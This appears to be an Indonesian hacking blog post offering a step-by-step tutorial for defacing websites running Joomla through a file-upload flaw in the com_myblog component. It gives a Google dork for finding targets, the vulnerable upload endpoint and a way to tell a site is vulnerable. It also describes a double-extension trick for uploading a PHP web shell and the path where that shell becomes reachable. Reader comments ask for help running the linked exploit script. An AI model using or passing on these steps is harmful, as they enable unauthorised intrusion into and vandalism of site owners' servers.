• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Deface dengan Joomla Com_Myblog Exploit

September 10, 2015 by Jack Wilder 3 Comments

Oke kali ini saya mau share tutorial deface dengan Exploit com_myblog pada CMS Joomla. Exploitnya cukup mudah sehingga bisa langsung dipraktekkan.
Langsung saja
Google dork : inurl:/components/com_myblog/
Exploiter : download
Exploit : /index.php?option=com_myblog&task=ajaxupload

Jika kalian mendapat error

{error: ‘No file has been uploaded.’, msg: ” }

Tanda nya situsnya vuln.

Langsung eksekusi saja dengan exploiternya. Jalankan dengan xampp jika kalian menggunakan windows atau langsung buka di terminal jika di linux.
Untuk shell , supaya sukses upload dengan ekstensi php.xxxjpg / html.xxxjpg
Jika sukses maka akan ada notice seperti di screenshoot :

Shell akses :
localhost/images/shell.php.xxxjpg

Untuk yang kurang jelas bia lihat videonya disini :

Sekian tutor kali ini semoga bermanfaat.

Shares

Filed Under: Tutorial Deface Tagged With: Deface, Exploit, Hacking

Reader Interactions

Comments

  1. olic edogawa says

    October 2, 2015 at 6:59 pm

    PHP Fatal error: Call to undefined function curl_init() in /root/wew/exp.php on
    line 3 ane gitu napa yah ?

    Reply
    • chiaki says

      October 3, 2015 at 8:06 am

      install phpcurl

      Reply
  2. Yuki-chan says

    November 12, 2017 at 6:14 am

    Web based ada gak?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

Arti dari Kata Deface yang Sering Dibahas oleh para Hacker

Zendesk Custom Domain or Subdomain Takeover

Cara Deface Website dengan Teknik Local File Inclusion

Prestashop Module Blocktestimonial File Upload Auto Exploit

RCE pada Redis via Master-Slave Replication

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

bWAPP Remote File Inclusion Medium Security Level

Download 1n73ct10n / 1n73ction Privat Web Shell by X’1N73CT

Cara Mudah Hack cPanel dengan Fitur Reset Password

Exploit WPStore Themes Upload Vulnerability

LinuxSec / 88 queries in 0.21 seconds